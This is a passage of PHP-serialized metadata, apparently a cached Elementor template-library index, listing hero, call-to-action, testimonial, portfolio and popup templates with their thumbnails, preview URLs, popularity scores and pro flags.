5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443691\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"62\";s:11:\"trend_index\";s:2:\"42\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:86;a:14:{s:2:\"id\";s:4:\"6258\";s:5:\"title\";s:6:\"Hero 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_3.png\";s:12:\"tmpl_created\";s:10:\"1520443693\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"395\";s:11:\"trend_index\";s:3:\"415\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:87;a:14:{s:2:\"id\";s:5:\"10137\";s:5:\"title\";s:34:\"Full Screen | Contact | Restaurant\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/rest_small.png\";s:12:\"tmpl_created\";s:10:\"1547976342\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/full-screen-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"483\";s:11:\"trend_index\";s:3:\"465\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:88;a:14:{s:2:\"id\";s:4:\"6266\";s:5:\"title\";s:6:\"Hero 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_4.png\";s:12:\"tmpl_created\";s:10:\"1520443695\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"54\";s:11:\"trend_index\";s:2:\"45\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:89;a:14:{s:2:\"id\";s:5:\"10244\";s:5:\"title\";s:17:\"Bottom Bar | Sale\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/wow_small.png\";s:12:\"tmpl_created\";s:10:\"1547976402\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/bottom-bar-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"512\";s:11:\"trend_index\";s:3:\"555\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:90;a:14:{s:2:\"id\";s:4:\"6274\";s:5:\"title\";s:6:\"Hero 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_5.png\";s:12:\"tmpl_created\";s:10:\"1520443698\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"101\";s:11:\"trend_index\";s:2:\"96\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:91;a:14:{s:2:\"id\";s:4:\"6017\";s:5:\"title\";s:6:\"CTA 14\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_14.png\";s:12:\"tmpl_created\";s:10:\"1520520331\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/cta-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"163\";s:11:\"trend_index\";s:3:\"202\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:92;a:14:{s:2:\"id\";s:5:\"10127\";s:5:\"title\";s:35:\"Fly In | Announcement | Maintenance\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/pizza_small.png\";s:12:\"tmpl_created\";s:10:\"1547984061\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/fly-in-announcement-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"563\";s:11:\"trend_index\";s:3:\"529\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:93;a:14:{s:2:\"id\";s:4:\"4826\";s:5:\"title\";s:14:\"Testimonial 24\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520520544\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/testimonial-24-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"255\";s:11:\"trend_index\";s:3:\"219\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:94;a:14:{s:2:\"id\";s:4:\"4835\";s:5:\"title\";s:14:\"Testimonial 16\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520520546\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-16/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"368\";s:11:\"trend_index\";s:3:\"369\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:95;a:14:{s:2:\"id\";s:4:\"4843\";s:5:\"title\";s:14:\"Testimonial 18\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520520548\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-18/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"388\";s:11:\"trend_index\";s:3:\"479\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:96;a:14:{s:2:\"id\";s:4:\"4854\";s:5:\"title\";s:14:\"Testimonial 13\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520520549\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"487\";s:11:\"trend_index\";s:3:\"519\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:97;a:14:{s:2:\"id\";s:4:\"4863\";s:5:\"title\";s:14:\"Testimonial 19\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520520551\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-19/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"253\";s:11:\"trend_index\";s:3:\"239\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:98;a:14:{s:2:\"id\";s:5:\"10776\";s:5:\"title\";s:33:\"Fly In | Contact | Social | Share\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/01/social1_small.png\";s:12:\"tmpl_created\";s:10:\"1548047055\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/fly-in-contact-social-share/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"550\";s:11:\"trend_index\";s:3:\"595\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:99;a:14:{s:2:\"id\";s:4:\"4871\";s:5:\"title\";s:14:\"Testimonial 12\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_3.png\";s:12:\"tmpl_created\";s:10:\"1520520552\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"241\";s:11:\"trend_index\";s:3:\"231\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:100;a:14:{s:2:\"id\";s:5:\"10785\";s:5:\"title\";s:33:\"Fly In | Contact | Social | Share\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/01/social2_small.png\";s:12:\"tmpl_created\";s:10:\"1548047593\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/fly-in-contact-social-share-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"452\";s:11:\"trend_index\";s:3:\"431\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:101;a:14:{s:2:\"id\";s:4:\"4880\";s:5:\"title\";s:14:\"Testimonial 20\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/customers-1.jpg\";s:12:\"tmpl_created\";s:10:\"1520520554\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-20/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"372\";s:11:\"trend_index\";s:3:\"363\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:102;a:14:{s:2:\"id\";s:4:\"4889\";s:5:\"title\";s:14:\"Testimonial 11\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/customers-2.jpg\";s:12:\"tmpl_created\";s:10:\"1520520556\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"434\";s:11:\"trend_index\";s:3:\"517\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:103;a:14:{s:2:\"id\";s:4:\"4897\";s:5:\"title\";s:14:\"Testimonial 21\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520520557\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-21/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"79\";s:11:\"trend_index\";s:2:\"61\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:104;a:14:{s:2:\"id\";s:4:\"4905\";s:5:\"title\";s:14:\"Testimonial 22\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_6.png\";s:12:\"tmpl_created\";s:10:\"1520520559\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-22/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"113\";s:11:\"trend_index\";s:2:\"84\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:105;a:14:{s:2:\"id\";s:4:\"4913\";s:5:\"title\";s:14:\"Testimonial 23\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_7.png\";s:12:\"tmpl_created\";s:10:\"1520520561\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-23/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"233\";s:11:\"trend_index\";s:3:\"268\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:106;a:14:{s:2:\"id\";s:4:\"4921\";s:5:\"title\";s:14:\"Testimonial 10\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_5.png\";s:12:\"tmpl_created\";s:10:\"1520520562\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"214\";s:11:\"trend_index\";s:3:\"247\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:107;a:14:{s:2:\"id\";s:4:\"4929\";s:5:\"title\";s:14:\"Testimonial 24\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_8.png\";s:12:\"tmpl_created\";s:10:\"1520520564\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-24/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"45\";s:11:\"trend_index\";s:2:\"26\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:108;a:14:{s:2:\"id\";s:4:\"4939\";s:5:\"title\";s:13:\"Testimonial 9\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_8.png\";s:12:\"tmpl_created\";s:10:\"1520520565\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/testimonial-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"88\";s:11:\"trend_index\";s:2:\"69\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:109;a:14:{s:2:\"id\";s:4:\"4947\";s:5:\"title\";s:14:\"Testimonial 27\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_9.png\";s:12:\"tmpl_created\";s:10:\"1520520567\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-27/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"192\";s:11:\"trend_index\";s:3:\"296\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:110;a:14:{s:2:\"id\";s:4:\"4955\";s:5:\"title\";s:14:\"Testimonial 29\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_9.png\";s:12:\"tmpl_created\";s:10:\"1520520569\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-29/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"324\";s:11:\"trend_index\";s:3:\"376\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:111;a:14:{s:2:\"id\";s:4:\"4963\";s:5:\"title\";s:14:\"Testimonial 25\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_10.png\";s:12:\"tmpl_created\";s:10:\"1520520570\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/testimonial-25-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"377\";s:11:\"trend_index\";s:3:\"406\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:112;a:14:{s:2:\"id\";s:4:\"4971\";s:5:\"title\";s:14:\"Testimonial 26\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_11.png\";s:12:\"tmpl_created\";s:10:\"1520520572\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-26/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"491\";s:11:\"trend_index\";s:3:\"535\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:113;a:14:{s:2:\"id\";s:4:\"4979\";s:5:\"title\";s:14:\"Testimonial 15\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_10.png\";s:12:\"tmpl_created\";s:10:\"1520520573\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"454\";s:11:\"trend_index\";s:3:\"485\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:114;a:14:{s:2:\"id\";s:4:\"4987\";s:5:\"title\";s:14:\"Testimonial 17\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_12-1.png\";s:12:\"tmpl_created\";s:10:\"1520520575\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"142\";s:11:\"trend_index\";s:3:\"158\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:115;a:14:{s:2:\"id\";s:4:\"4995\";s:5:\"title\";s:14:\"Testimonial 14\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_12.png\";s:12:\"tmpl_created\";s:10:\"1520520577\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/testimonial-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"354\";s:11:\"trend_index\";s:3:\"320\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:116;a:14:{s:2:\"id\";s:4:\"5007\";s:5:\"title\";s:11:\"Portfolio 7\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520520578\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"46\";s:11:\"trend_index\";s:2:\"38\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:117;a:14:{s:2:\"id\";s:4:\"5019\";s:5:\"title\";s:11:\"Portfolio 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520520580\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"169\";s:11:\"trend_index\";s:3:\"155\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:118;a:14:{s:2:\"id\";s:4:\"5027\";s:5:\"title\";s:12:\"Portfolio 11\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520520581\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/portfolio-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"295\";s:11:\"trend_index\";s:3:\"298\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:119;a:14:{s:2:\"id\";s:5:\"10794\";s:5:\"title\";s:34:\"Classic | Contact | Social | Share\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2019/01/s_small.png\";s:12:\"tmpl_created\";s:10:\"1548067619\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-contact-social-share/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"450\";s:11:\"trend_index\";s:3:\"379\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:120;a:14:{s:2:\"id\";s:4:\"5037\";s:5:\"title\";s:12:\"Portfolio 12\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520520583\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/portfolio-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"266\";s:11:\"trend_index\";s:3:\"289\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:121;a:14:{s:2:\"id\";s:4:\"5057\";s:5:\"title\";s:12:\"Portfolio 13\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_4.png\";s:12:\"tmpl_created\";s:10:\"1520520586\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/portfolio-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"portfolio\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"219\";s:11:\"trend_index\";s:3:\"191\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:122;a:14:{s:2:\"id\";s:4:\"5071\";s:5:\"title\";s:12:\"Portfolio 